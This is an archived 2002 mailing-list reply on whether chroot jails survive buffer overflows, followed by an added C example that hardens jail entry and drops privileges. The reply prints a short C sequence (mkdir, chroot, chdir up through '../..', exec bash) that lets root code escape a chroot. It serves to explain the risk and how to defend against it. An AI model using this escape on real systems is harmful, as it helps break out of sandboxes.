Re: OT? Are chroots immune to buffer overflows?

From: Luciano Miguel Ferreira Rocha (strangeat_private-ip.org)
Date: Wed May 22 2002 - 10:24:05 PDT


    On Wed, May 22, 2002 at 01:02:56PM +0200, SpaceWalker wrote:
    > But if you are able to run code as root, a few syscalls are still available to you:
    > inserting modules and ptrace().
    
    If you're able to run code as root, all you need, in most Un*x systems,
    is:
    #include <sys/stat.h>   /* mkdir(2) */
    #include <unistd.h>     /* chroot(2), chdir(2), execl(3) */
    mkdir("blah", 0700);    /* mkdir(2) takes a mode argument */
    chroot("blah");
    chdir("../../../../../../");
    chroot(".");
    execl("/bin/bash", "bash", NULL);
    
    On other Un*x systems, like some BSDs, an implicit chdir(".") is always
    made after a chroot, so this doesn't work, but you can still do mknod(2),
    mount(2), etc.
    
    The point is if the chrooted program runs as root, almost anything can be
    done.
    
    If it doesn't, an attacker can only play with inherited file descriptors,
    kill(2) and ptrace(2) to processes belonging to the same user, and
    meddle with the accessible filesystem for private records or to aid in
    an intrusion.
    
    Regards
    
    -- 
    Luciano Rocha, strangeat_private
    
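The defensive counterpart to the sequence discussed in the message, added here as an example that is not part of the original post: enter the jail with the working directory already inside it, re-anchor it at the new root, then give up root for good and verify that uid 0 cannot be regained, which is what makes the mkdir/chroot/chdir("../..") escape unavailable. It assumes Linux/glibc (chroot(2), setgroups(2) prototypes under _GNU_SOURCE); the function names, the jail directory and the uid/gid values a caller passes are placeholders.

```c
#define _GNU_SOURCE   /* glibc: expose chroot(2) and setgroups(2) prototypes */
#include <errno.h>
#include <grp.h>
#include <sys/types.h>
#include <unistd.h>

/* Post-condition check: real and effective ids are the unprivileged target
 * and uid 0 can no longer be regained (a surviving saved uid 0 would let
 * setuid(0) succeed). Returns 1 when privileges are really gone. */
int privileges_dropped(uid_t uid, gid_t gid)
{
    if (uid == 0 || gid == 0)
        return 0;                 /* "dropping" to root is not dropping */
    if (getuid() != uid || geteuid() != uid)
        return 0;
    if (getgid() != gid || getegid() != gid)
        return 0;
    if (setuid(0) == 0 || seteuid(0) == 0)
        return 0;
    return 1;
}

/* Enter the jail at dir and give up root for good. The cwd moves inside the
 * jail before chroot() and is re-anchored at "/" afterwards, so nothing
 * outside the new root stays reachable; root is dropped last, which is what
 * makes the mkdir/chroot/chdir("../..") sequence above unavailable.
 * Returns 0 on success, -1 with errno set on failure. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    if (chdir(dir) == -1)         /* cwd inside the future root */
        return -1;
    if (chroot(".") == -1)        /* needs root / CAP_SYS_CHROOT */
        return -1;
    if (chdir("/") == -1)         /* never leave cwd pointing outside */
        return -1;
    if (setgroups(0, NULL) == -1) /* supplementary groups first */
        return -1;
    if (setgid(gid) == -1)        /* gid before uid, while still root */
        return -1;
    if (setuid(uid) == -1)        /* as root: sets real, effective and saved */
        return -1;
    if (!privileges_dropped(uid, gid)) {
        errno = EPERM;
        return -1;
    }
    return 0;
}
```

Run unprivileged, enter_jail() fails at chroot(2) with EPERM; run as root it confines the process and the final check refuses to report success if any route back to uid 0 remains.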



    This archive was generated by hypermail 2b30 : Thu May 23 2002 - 20:56:03 PDT